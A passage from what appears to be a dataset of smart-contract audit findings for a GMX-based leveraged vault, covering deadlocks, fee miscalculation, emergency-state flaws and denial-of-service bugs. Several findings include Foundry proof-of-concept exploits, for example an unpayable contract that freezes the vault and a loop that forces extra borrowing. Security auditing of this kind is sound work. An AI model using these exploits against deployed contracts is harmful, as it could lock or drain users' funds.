IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); // the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlipage may result to a revert an cause the tokens stays in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n /// what this return in case zero balance?? zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // revert if zero value, status not open or compound_failed , executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n\\nIn the event of a successful deposit, the contract will set the status to `open` again. However, if the deposit is cancelled, the callback will call `processCompoundCancellation()` function and the status will be set to `compound_failed` as shown in the following code:\\n```\\n function processCompoundCancellation(GMXTypes.Store storage self) external {\\n GMXChecks.beforeProcessCompoundCancellationChecks(self);\\n self.status = GMXTypes.Status.Compound_Failed;\\n\\n emit CompoundCancelled();\\n }\\n```\\n\\nThe issue arises when the deposit is cancelled, and the status becomes `compound_failed`. In this scenario, only the compound function can be called again and only by the keeper, but the tokens have already been swapped for TokenA or TokenB (Because we successfully create a deposit in `GMX` that means the swap was successfull). Consequently, the `amountIn` will be zero, and in this case the compound logic will be skipped.\\n```\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n //compound logic\\n //// rest of code.\\n }\\n```\\n\\nAs a result, the status will remain `compound_failed`, leading to a deadlock. If keeper continue to call this function, no progress will be made, only gas will be wasted. Furthermore, all interactions with the protocol are impossible since the status is `compound_failed`.чincorrect handling of compound cancelation lead vault to stuck at `compound_failed` status\\nin the event of a deposit get cancelled when trying to compound. just add liquidity again without the swapping logic.чstrategy vault stuck at `compond_failed` status. prevent any interaction with the protocol\\nkeeper may waste a lot of gas trying to handle this situation .ч```\\n function compound(GMXTypes.Store storage self, GMXTypes.CompoundParams memory cp) external {lt\\n if (self.tokenA.balanceOf(address(self.trove)) > 0) {\\n self.tokenA.safeTransferFrom(address(self.trove), address(this), self.tokenA.balanceOf(address(self.trove)));\\n }\\n if (self.tokenB.balanceOf(address(self.trove)) > 0) {\\n self.tokenB.safeTransferFrom(address(self.trove), address(this), self.tokenB.balanceOf(address(self.trove)));\\n }\\n\\n uint256 _tokenInAmt = IERC20(cp.tokenIn).balanceOf(address(this));\\n\\n // Only compound if tokenIn amount is more than 0\\n if (_tokenInAmt > 0) {\\n self.refundee = payable(msg.sender); // the msg.sender is the keeper.\\n\\n self.compoundCache.compoundParams = cp; // storage update.\\n\\n ISwap.SwapParams memory _sp;\\n\\n _sp.tokenIn = cp.tokenIn;\\n _sp.tokenOut = cp.tokenOut;\\n _sp.amountIn = _tokenInAmt;\\n _sp.amountOut = 0; // amount out minimum calculated in Swap\\n _sp.slippage = self.minSlippage; // minSlipage may result to a revert an cause the tokens stays in this contract.\\n _sp.deadline = cp.deadline;\\n\\n GMXManager.swapExactTokensForTokens(self, _sp); // return value not checked.\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n /// what this return in case zero balance?? zero\\n self.compoundCache.depositValue = GMXReader.convertToUsdValue(\\n self, address(self.tokenA), self.tokenA.balanceOf(address(this))\\n ) + GMXReader.convertToUsdValue(self, address(self.tokenB), self.tokenB.balanceOf(address(this)));\\n // revert if zero value, status not open or compound_failed , executionFee < minExecutionFee.\\n GMXChecks.beforeCompoundChecks(self);\\n\\n self.status = GMXTypes.Status.Compound;\\n\\n _alp.minMarketTokenAmt =\\n GMXManager.calcMinMarketSlippageAmt(self, self.compoundCache.depositValue, cp.slippage);\\n\\n _alp.executionFee = cp.executionFee;\\n self.compoundCache.depositKey = GMXManager.addLiquidity(self, _alp);\\n }\\n```\\n -The protocol will mint unnecessary fees if the vault is paused and reopened later.чmediumчUnnecessary fees will be minted to the treasury if the vault is paused and reopened later.\\nBased on the test results, the protocol mints 5(this can be more) wei(gvToken) for each `gvToken` every second since the last fee collection. For example, if the `totalSupply` of `gvToken` is 1000000e18 and the time difference between the current block and the last fee collection is 10 seconds, the amount of lp tokens minted as a fee will be 50000000 wei in terms of `gvToken`. This is acceptable when the protocol is functioning properly.\\n```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n\\nHowever, if the protocol needs to be paused due to a hack or other issues, and then the vault is reopened, let's say after 1 month of being paused, the time difference from `block.timestamp - _secondsFromLastCollection` will be = 2630000s\\nIf the first user tries to deposit after the vault reopens, the fees charged will be 1000000e18 * 5 * 2630000 / 1e18 = 1315000000000\\nThis is an unnecessary fee generated for the treasury because the vault was paused for a long time, but the fee is still generated without taking that into account. This can result in the treasury consuming a portion of the user shares.чIf the vault is being reopened, there should be a function to override the _store.lastFeeCollected = block.timestamp; with block.timestamp again.чThis will lead to a loss of user shares for the duration when the vault was not active. The severity of the impact depends on the fee the protocol charges per second, the totalSupply of vault tokens, and the duration of the vault being paused.ч```\\nfunction pendingFee(GMXTypes.Store storage self) public view returns (uint256) {\\n uint256 totalSupply_ = IERC20(address(self.vault)).totalSupply();\\n uint256 _secondsFromLastCollection = block.timestamp - self.lastFeeCollected;\\n return (totalSupply_ * self.feePerSecond * _secondsFromLastCollection) / SAFE_MULTIPLIER;\\n }\\n```\\n -`emergencyPause` does not check the state before running && can cause loss of funds for usersчmediumчThe `emergencyPause` function in the GMX smart contract can be called by the keeper at any time without pre-transaction checks. In some cases this could result in financial loss for users if the function is executed before the callbacks have executed.\\nThe emergencyPause function lacks a control mechanism to prevent execution before callbacks execution. While it is designed to halt all contract activities in an emergency, its unrestricted execution could disrupt ongoing transactions. For example, if a user calls a function like deposit which involves multiple steps and expects a callback, and emergencyPause is invoked before the callback is executed, the user might lose his funds as he will not be able to mint svTokens.\\nSince `emergencyPause` updates the state of the Vault to `GMXTypes.Status.Paused`, when the callback from GMX executes the `afterDepositExecution` nothing will happen since the conditions are not met. Which means that any deposit amount will not be met by a mint of svTokens.\\n```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the conditions are not met\\n }\\n```\\n\\nIf by any chance, the `processDeposit` function is executed (or any other function from the callback) it will still revert in the beforeChecks (like the beforeProcessDepositChecks).\\n```\\n function beforeProcessDepositChecks(\\n GMXTypes.Store storage self\\n ) external view {\\n if (self.status != GMXTypes.Status.Deposit)\\n revert Errors.NotAllowedInCurrentVaultStatus();\\n }\\n```\\nчTo mitigate this risk, the following recommendations should be implemented:\\nIntroduce a state check mechanism that prevents emergencyPause from executing if there are pending critical operations that must be completed to ensure the integrity of in-progress transactions.\\nImplement a secure check that allows emergencyPause to queue behind critical operations, ensuring that any ongoing transaction can complete before the pause takes effect.чIf the emergency pause is triggered at an inopportune time, it could:\\nPrevent the completion of in-progress transactions.\\nLead to loss of funds if the transactions are not properly rolled back.\\nErode user trust in the system due to potential for funds to be stuck without recourse.\\nPOC :\\nYou can copy this test in the file GMXEmergencyTest.t.sol then execute the test with the command forge test --mt\\n```\\n function test_UserLosesFundsAfterEmergencyPause() external {\\n deal(address(WETH), user1, 20 ether);\\n uint256 wethBalanceBefore = IERC20(WETH).balanceOf(user1);\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 10e18, 1, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n\\n vm.prank(owner);\\n vault.emergencyPause();\\n\\n vm.prank(user1);\\n mockExchangeRouter.executeDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n uint256 wethBalanceAfter = IERC20(WETH).balanceOf(user1);\\n //Check that no tokens have been minted to user while user loses funds = 10 eth\\n assertEq(IERC20(vault).balanceOf(user1), 0);\\n assertEq(wethBalanceAfter, wethBalanceBefore - 10 ether);\\n\\n }\\n```\\nч```\\n function afterDepositExecution(\\n bytes32 depositKey,\\n IDeposit.Props memory /* depositProps */,\\n IEvent.Props memory /* eventData */\\n ) external onlyController {\\n GMXTypes.Store memory _store = vault.store();\\n\\n if (\\n _store.status == GMXTypes.Status.Deposit &&\\n _store.depositCache.depositKey == depositKey\\n ) {\\n vault.processDeposit();\\n } else if (\\n _store.status == GMXTypes.Status.Rebalance_Add &&\\n _store.rebalanceCache.depositKey == depositKey\\n ) {\\n vault.processRebalanceAdd();\\n } else if (\\n _store.status == GMXTypes.Status.Compound &&\\n _store.compoundCache.depositKey == depositKey\\n ) {\\n vault.processCompound();\\n } else if (\\n _store.status == GMXTypes.Status.Withdraw_Failed &&\\n _store.withdrawCache.depositKey == depositKey\\n ) {\\n vault.processWithdrawFailureLiquidityAdded();\\n } else if (_store.status == GMXTypes.Status.Resume) {\\n // This if block is to catch the Deposit callback after an\\n // emergencyResume() to set the vault status to Open\\n vault.processEmergencyResume();\\n }\\n \\n\\n@ > // The function does nothing as the conditions are not met\\n }\\n```\\n -try-catch does not store the state when it is revertedчhighчIf a withdrawal from GMX is successful without any errors, the borrowed amount is repayed to the lending vaults within a try-catch block within the processWithdraw function. Subsequently, the afterWithdrawChecks are performed. If a revert occurs during this step, everything executed within the try-catch block is reseted, and the Vault's status is set to 'Withdraw_Failed.' In such a scenario, a Keeper must call the processWithdrawFailure function. In this case, there is an erroneous attempt to borrow from the LendingVaults again, even though the repayment never actually occurred due to the revert within the try-catch block.\\nHere is a POC that demonstrates how a user can exploit this bug by intentionally causing the afterWithdrawChecks to fail, resulting in additional borrowing from the LendingVault in the processWithdrawFailure function.\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from \"forge-std/Test.sol\";\\nimport { TestUtils } from \"../../helpers/TestUtils.sol\";\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport { GMXMockVaultSetup } from \"./GMXMockVaultSetup.t.sol\";\\nimport { GMXTypes } from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport { GMXTestHelper } from \"./GMXTestHelper.sol\";\\n\\nimport { IDeposit } from \"../../../contracts/interfaces/protocols/gmx/IDeposit.sol\";\\nimport { IEvent } from \"../../../contracts/interfaces/protocols/gmx/IEvent.sol\";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n //User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. (The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. (Token A is irrelevant as Delta is Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log(\"DebtAmtBefore: %s\", debtAmtTokenBBefore);\\n console.log(\"DebtAmtAfter: %s\", debtAmtTokenBAfter);\\n console.log(\"leverageBefore: %s\", leverageBefore);\\n console.log(\"leverageAfter: %s\", leverageAfter);\\n }\\n}\\n```\\n\\nThe PoC can be started with this command: `forge test --match-test test_POC1 -vv`чIn processWithdrawFailure, no more borrowing should occur:\\n```\\nFile: contracts/strategy/gmx/GMXWithdraw.sol#processWithdrawFailure\\nGMXManager.borrow(\\n self,\\n self.withdrawCache.repayParams.repayTokenAAmt,\\n self.withdrawCache.repayParams.repayTokenBAmt\\n);\\n```\\n\\nThese lines of code should be deletedчUsers can intentionally deplete the capacity of a lending vault to increase the leverage of a vault. This also results in lending vaults having no capacity left for new deposits. As a result, the utilization rate increases significantly, leading to higher borrowing costs.ч```\\n// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\nimport { console, console2 } from \"forge-std/Test.sol\";\\nimport { TestUtils } from \"../../helpers/TestUtils.sol\";\\nimport { IERC20 } from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport { GMXMockVaultSetup } from \"./GMXMockVaultSetup.t.sol\";\\nimport { GMXTypes } from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport { GMXTestHelper } from \"./GMXTestHelper.sol\";\\n\\nimport { IDeposit } from \"../../../contracts/interfaces/protocols/gmx/IDeposit.sol\";\\nimport { IEvent } from \"../../../contracts/interfaces/protocols/gmx/IEvent.sol\";\\n\\ncontract GMXDepositTest is GMXMockVaultSetup, GMXTestHelper, TestUtils {\\n function test_POC1() public {\\n //Owner deposits 1 ether in vault\\n vm.startPrank(owner);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n\\n //User1 deposits 1 ether in vault\\n vm.startPrank(user1);\\n _createDeposit(address(WETH), 1 ether, 0, SLIPPAGE, EXECUTION_FEE);\\n vm.stopPrank();\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n \\n //Variables for assertion\\n uint256 leverageBefore = vault.leverage();\\n (,uint256 debtAmtTokenBBefore) = vault.debtAmt();\\n\\n uint256 vaultSharesAmount = IERC20(address(vault)).balanceOf(user1); //Vault shares to withdraw\\n GMXTypes.Store memory _store;\\n for(uint256 i; i < 5; i++) {\\n vm.startPrank(user1);\\n //User1 tries to withdraw all of his deposits and enters an unrealistically high amount as the minWithdrawAmt (10000 ether) to intentionally make the afterWithdrawChecks fail\\n _createAndExecuteWithdrawal(address(WETH), address(USDC), address(USDC), vaultSharesAmount, 10000 ether, SLIPPAGE, EXECUTION_FEE);\\n\\n _store = vault.store();\\n assert(uint256(_store.status) == uint256(GMXTypes.Status.Withdraw_Failed)); //Since the afterWithdrawChecks have failed, the Vault status is Withdraw_Failed\\n\\n //Keeper calls processWithdrawFailure to deposit the withdrawn tokens back into GMX, mistakenly borrowing something from the LendingVaults in the process.\\n vault.processWithdrawFailure{value: EXECUTION_FEE}(SLIPPAGE, EXECUTION_FEE);\\n mockExchangeRouter.executeDeposit(address(WETH), address(USDC), address(vault), address(callback));\\n vm.stopPrank();\\n } //The for-loop is there to demonstrate that a user can easily execute the process multiple times to increase \\n //the debt and leverage. (The user can do it as long as the Lending Vaults have liquidity.)\\n\\n //Variables for assertion\\n uint256 leverageAfter = vault.leverage();\\n (,uint256 debtAmtTokenBAfter) = vault.debtAmt();\\n\\n //Shows that after the failed withdrawal process, debt and leverage are higher. (Token A is irrelevant as Delta is Long)\\n assert(debtAmtTokenBAfter > debtAmtTokenBBefore);\\n assert(leverageAfter > leverageBefore);\\n\\n console.log(\"DebtAmtBefore: %s\", debtAmtTokenBBefore);\\n console.log(\"DebtAmtAfter: %s\", debtAmtTokenBAfter);\\n console.log(\"leverageBefore: %s\", leverageBefore);\\n console.log(\"leverageAfter: %s\", leverageAfter);\\n }\\n}\\n```\\n -Setter functions for core GMX contractsчmediumчGMX docs state that their `ExchangeRouter` and `GMXOracle` contracts `will` change as new logic is added. Therefore setter functions should be added to `GMXVault.sol` to be able to update the state variables storing those addressed when the need arises.\\nFrom the GMX docs:\\n```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\nчCreate setter functions in `GMXVault.sol` as below:\\n```\\n function updateExchangeRouter(address exchangeRouter) external onlyOwner {\\n _store.exchangeRouter = exchangeRouter;\\n emit ExchangeRouterUpdated(exchangeRouter);\\n }\\n\\n function updateGMXOracle(address gmxOracle) external onlyOwner {\\n _store.gmxOracle = gmxOracle;\\n emit GMXOracleUpdated(gmxOracle);\\n }\\n```\\nчNot being able to use the `ExchangeRouter` and `GMXOracle` contracts the protocol would effectively be unusable given their importance.ч```\\nIf using contracts such as the ExchangeRouter, Oracle or Reader do note that their addresses will change as new logic is added\\n```\\n -`GMXVault` can be blocked by a malicious actorчhighч`GMXVault` can be blocked by malicious actor if he made a `depositNative` call with unpayable contract and the deposit then cancelled by the GMX exchange router (3rd party).\\nUsers can deposit native tokens in vaults that either of its token pair is a WNT (wrapped native token) by calling `GMXVault.depositNative` payable function with the required deposit parameters (such as token, amount, minimum share amount, slippage & execution fees), then this function will invoke `GMXDeposit.deposit` with a `msg.value` equals the amount that the user wants to deposit + execution fees.\\nIn GMXDeposit.deposit: various checks are made to ensure the sanity of the deposit parameters and the elligibility of the user to deposit, and to calculate the required `tokenA` & `tokenB` needed to deposit in the `GMX` protocol, then the sent native tokens are deposited in the WNT contract and an equivalent amount of WNT is transferred to the vault.\\nAnd before the call is made to the `GMXManager.addLiquidity` (where a call is going to be made to the `GMX.exchangeRouter` contract) to add liquidity; the status of the vault is checked if it's `Open`, if yes; then the status of the vault is set to `Deposit` so that no more deposits or withdrawls can be made (the vault will be blocked until the operation succeeds).\\nSo if the operation succeeds in the `GMX` exchange router; the vault callback will invoke `preocessDeposit` function to finish the process and update the vault status to `Open`.\\nAnd if the operation of adding liquidity is cancelled by the `GMX` exchange router (3rd party); the vault callback will invoke `processDepositCancellation` function to rollback the process by repaying the lendingVaults debts and paying back the native tokens sent by the user, then update the vault status to Openso that the vault is open again for deposits and withdrawals.\\nUsually the deposit (liquidity addition to `GMX` protocol) fails if the user sets a very high slippage parameter when making a deposit (dp.slippage).\\nHow can this be exploited to block the vault? Imagine the following scenario:\\nIf a malicious user deploys an unpayable contract (doesn't receive native tokens) and makes a call to the `GMXVault.depositNative` function with a very high slippage to ensure that the deposit will be cancelled by the GMX exchange router.\\nSo when the deposit is cancelled and the vault callback `processDepositCancellation` function is invoked by the router; it will revert as it will try to send back the native tokens to the user who tried to make the deposit (which is the unpayable contract in our case).\\nAnd the status of the vault will be stuck in the `Deposit` state; so no more deposits or withdrawals can be made and the vault will be disabled.\\nThe same scenario will happen if the user got blocklisted later by the deposited token contract (tokenA or tokenB), but the propability of this happening is very low as the GMX exchange router will add liquidity in two transactions with a small time separation between them!\\nCode Instances:\\nGMXVault.depositNative\\n```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n\\nGMXDeposit.deposit /L88\\n```\\n_dc.user = payable(msg.sender);\\n```\\n\\nGMXDeposit.processDepositCancellation /L209-210\\n```\\n(bool success, ) = self.depositCache.user.call{value: address(this).balance}(\"\");\\n require(success, \"Transfer failed.\");\\n```\\n\\nFoundry PoC:\\nA `BlockerContract.sol` is added to mimick the behaviour of an unpayable contract. add the following contract to the `2023-10-SteadeFi/test/gmx/local/BlockerContract.sol` directory:\\n`// SPDX-License-Identifier: MIT\\npragma solidity 0.8.21;\\n\\nimport {GMXTypes} from \"../../../contracts/strategy/gmx/GMXTypes.sol\";\\nimport {GMXVault} from \"../../../contracts/strategy/gmx/GMXVault.sol\";\\n\\ncontract BlockerContract {\\n constructor() payable {}\\n\\n function callVault(\\n address payable _vaultAddress,\\n GMXTypes.DepositParams memory dp\\n ) external {\\n GMXVault targetVault = GMXVault(_vaultAddress);\\n targetVault.depositNative{value: address(this).balance}(dp);\\n }\\n}`\\n`test_processDepositCancelWillBlockVault` test is added to to the `2023-10-SteadeFi/test/gmx/local/GMXDepositTest.sol` directory; where the blockerContract is deployed with some native tokens to cover deposit amount + execution fees, then this contract calls the `depositNative` via `BlockerContract.callVault`, where the exchange router tries to cancel the deposit but it will not be able as the BlockerContract can't receive back deposited native tokens, and the vault will be blocked.\\nadd this import statement and test to the `GMXDepositTest.sol` file :\\n`import {BlockerContract} from \"./BlockerContract.sol\";`\\n` function test_processDepositCancelWillBlockVault() external {\\n //1. deploy the blockerContract contract with a msg.value=deposit amount + execution fees:\\n uint256 depositAmount = 1 ether;\\n\\n BlockerContract blockerContract = new BlockerContract{\\n value: depositAmount + EXECUTION_FEE\\n }();\\n\\n //check balance before deposit:\\n uint256 blockerContractEthBalance = address(blockerContract).balance;\\n assertEq(depositAmount + EXECUTION_FEE, blockerContractEthBalance);\\n\\n //2. preparing deposit params to call \"depositNative\" via the blockerContract:\\n depositParams.token = address(WETH);\\n depositParams.amt = depositAmount;\\n depositParams.minSharesAmt = 0;\\n depositParams.slippage = SLIPPAGE;\\n depositParams.executionFee = EXECUTION_FEE;\\n\\n blockerContract.callVault(payable(address(vault)), depositParams);\\n\\n // vault status is \"Deposit\":\\n assertEq(uint256(vault.store().status), 1);\\n\\n //3. the blockerContract tries to cancel the deposit, but it will not be able to do beacuse it's unpayable contract:\\n vm.expectRevert();\\n mockExchangeRouter.cancelDeposit(\\n address(WETH),\\n address(USDC),\\n address(vault),\\n address(callback)\\n );\\n\\n // vault status will be stuck at \"Deposit\":\\n assertEq(uint256(vault.store().status), 1);\\n\\n // check balance after cancelling the deposit, where it will be less than the original as no refund has been paid (the blockerContract is unpayable):\\n assertLt(address(blockerContract).balance, blockerContractEthBalance);\\n }`\\nTest result:\\n`$ forge test --mt `test_processDepositCancelWillBlockVault`\\nRunning 1 test for test/gmx/local/GMXDepositTest.sol:GMXDepositTest\\n[PASS] test_processDepositCancelWillBlockVault() (gas: 1419036)\\nTest result: ok. 1 passed; 0 failed; 0 skipped; finished in 24.62ms\\nRan 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)`чAdd a mechanism to enable the user from redeeming his cancelled deposits (pulling) instead of sending it back to him (pushing).чThe vault will be blocked as it will be stuck in the `Deposit` state; so no more deposits or withdrawals can be made.ч```\\n function depositNative(GMXTypes.DepositParams memory dp) external payable nonReentrant {\\n GMXDeposit.deposit(_store, dp, true);\\n }\\n```\\n -Emergency Closed Vault Can Be Paused Then ResumeчmediumчThe `emergencyClose` function is intended to be a final measure to repay all debts and shut down the vault permanently, as indicated by the function's documentation. This action should be irreversible to ensure the finality and security of the vault's emergency closure process.\\n```\\nFile: GMXVaul.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n\\nHowever, a pathway exists to effectively reopen a vault after it has been closed using `emergencyClose` by invoking the `emergencyPause` and `emergencyResume` functions. These functions alter the vault's status, allowing for the resumption of operations which contradicts the intended irreversible nature of an emergency close.\\n```\\nFile: GMXEmergency.sol\\n function emergencyPause(\\n GMXTypes.Store storage self\\n ) external {\\n self.refundee = payable(msg.sender);\\n\\n\\n GMXTypes.RemoveLiquidityParams memory _rlp;\\n\\n\\n // Remove all of the vault's LP tokens\\n _rlp.lpAmt = self.lpToken.balanceOf(address(this));\\n _rlp.executionFee = msg.value;\\n\\n\\n GMXManager.removeLiquidity(\\n self,\\n _rlp\\n );\\n\\n\\n self.status = GMXTypes.Status.Paused;\\n\\n\\n emit EmergencyPause();\\n }\\n```\\n\\n```\\nFile: GMXEmergency.sol\\n function emergencyResume(\\n GMXTypes.Store storage self\\n ) external {\\n GMXChecks.beforeEmergencyResumeChecks(self);\\n\\n\\n self.status = GMXTypes.Status.Resume;\\n\\n\\n self.refundee = payable(msg.sender);\\n\\n\\n GMXTypes.AddLiquidityParams memory _alp;\\n\\n\\n _alp.tokenAAmt = self.tokenA.balanceOf(address(this));\\n _alp.tokenBAmt = self.tokenB.balanceOf(address(this));\\n _alp.executionFee = msg.value;\\n\\n\\n GMXManager.addLiquidity(\\n self,\\n _alp\\n );\\n }\\n```\\n\\nAdd this to GMXEmergencyTest.t.sol and test with forge test --mt test_close_then_pause -vv:\\n```\\n function test_close_then_pause() external {\\n // Pause the vault\\n vault.emergencyPause();\\n console2.log(\"vault status\", uint256(vault.store().status));\\n\\n // Close the vault\\n vault.emergencyClose(deadline);\\n console2.log(\"vault status\", uint256(vault.store().status));\\n\\n // Pause the vault again\\n vault.emergencyPause();\\n console2.log(\"vault status\", uint256(vault.store().status));\\n assertEq(uint256(vault.store().status), 10, \"vault status not set to paused\");\\n\\n // Resume the vault\\n vault.emergencyResume();\\n console2.log(\"vault status\", uint256(vault.store().status));\\n }\\n```\\nчImplement a permanent state or flag within the vault's storage to irrevocably mark the vault as closed after `emergencyClose` is called. This flag should prevent any further state-altering operations.\\nModify the `emergencyPause` and `emergencyResume` functions to check for this permanent closure flag and revert if the vault has been emergency closed.чThe impact of this finding is significant, as it undermines the trust model of the emergency close process. Users and stakeholders expect that once a vault is closed in an emergency, it will remain closed as a protective measure. The ability to resume operations after an emergency closure could expose the vault to additional risks and potentially be exploited by malicious actors, especially if the original closure was due to a security threat.ч```\\nFile: GMXVaul.sol\\n /**\\n * @notice Repays all debt owed by vault and shut down vault, allowing emergency withdrawals\\n * @dev Note that this is a one-way irreversible action\\n * @dev Should be called by approved Owner (Timelock + MultiSig)\\n * @param deadline Timestamp of swap deadline\\n */\\n function emergencyClose(uint256 deadline) external onlyOwner {\\n GMXEmergency.emergencyClose(_store, deadline);\\n }\\n```\\n -The transfer of ERC-20 tokens with blacklist functionality in process functions can lead to stuck vaultsчmediumчInside a few process functions are ERC-20 tokens transfered which could potentially have a blacklist functionality. This can lead to a DoS of the strategy vault. If for example, a blacklisted user withdraws funds.\\nSome ERC-20 tokens like for example USDC (which is used by the system) have the functionality to blacklist specific addresses, so that they are no longer able to transfer and receive tokens. Sending funds to these addresses will lead to a revert. A few of the process functions inside the deposit and withdraw contracts transfer ERC-20 tokens to addresses which could potentially be blacklisted. The system is not in an Open state when a keeper bot interacts with such a process function, and if the call to such a function reverts, the status can not be updated back to Open. Therefore, it will remain in the given status and a DoS for all users occurs. The only possibility that DoS stops would be when the user is no longer blacklisted, which can potentially last forever.\\nThe attack flow (could be accidental) would for example look like this:\\nUSDC Blacklisted user calls withdraw with the wish to withdraw USDC\\nwithdraw function passes and status is updated to GMXTypes.Status.Withdraw\\nKeeper calls the processWithdraw function\\nTransferring USDC tokens to blacklisted user reverts\\nTherefore vault is stuck inside GMXTypes.Status.Withdraw 